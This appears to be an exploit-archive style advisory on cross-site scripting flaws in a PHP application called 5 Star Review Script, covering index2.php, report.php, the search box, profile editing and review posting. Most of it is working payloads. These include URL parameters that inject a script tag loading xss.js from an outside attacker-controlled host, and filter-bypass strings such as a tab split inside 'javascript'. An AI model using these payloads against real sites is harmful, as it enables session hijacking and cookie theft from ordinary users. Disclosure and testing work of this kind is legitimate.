5 Star Review Script
Homepage: http://www.review-script.com/ Effected files: index2.php report.php search box editing your profile posting a review. ---------------------------------- index2.php XSS Vuln with cookie disclosure: By ending quotes and using a few closing and opening tags before and after, we can insertour script code and produce this vulnerability. http://www.example.com/index2.php?pg=2&item_id=11&sort=review.id'>">'><SCRIPT%20SRC=http://www.youfucktard. com/xss.js></SCRIPT><"<"<"<"&order=DESC&PHPSESSID=91c137efddf8844a26f5c57a8ca2d57d Screenshots: http://www.youfucktard.com/xsp/5star1.jpg http://www.youfucktard.com/xsp/5star2.jpg Aftering clicking the "Email a friend this link" we notice our text partyl is still on the screen aswell, dueto the cookie. Screenshots: http://www.youfucktard.com/xsp/5star3.jpg -------------------------------------- report.php XSS Vuln same as above: http://www.example.com/report.php?id=970&item_id=251'>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT><"<"<"<" Again, the cookie data is output on our screen. -------------------------------------- search_reviews.php XSS Vuln: One way to achive this XSS example would be to use long UTF-8 Unicode encoding without semicolons. For PoC try putting this in the search box: '>">'<IMG SRC=javascript:alert('XSS')><"<"<"<" Now, if we try touse '>">'><SCRIPT%20SRC=http://www.youfucktard.com/xss.js></SCRIPT><"<"<"<" Like the previous results, we get a screen spammed full of "javascript is not allowed" which goes all the way across, and down several screens. Screenshot: http://www.youfucktard.com/xsp/5star4.jpg --------------------------------------------- Editing your profile XSS Vuln: For aPoC try using no filtering at all: <SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT> Screenshots: http://www.youfucktard.com/xsp/5star5.jpg http://www.youfucktard.com/xsp/5star6.jpg ------------------------------------------ When posting a review, theres many ways to bypass the filters they use. The way I used in thisscreenshot was to put a tab between jav ascript. For aPoC make sure tabs on and enter: <IMG SRC="jav ascript:alert('XSS');"> Screenshots: http://www.youfucktard.com/xsp/5star7.jpg http://www.youfucktard.com/xsp/5star8.jpg -----------------------------------------------
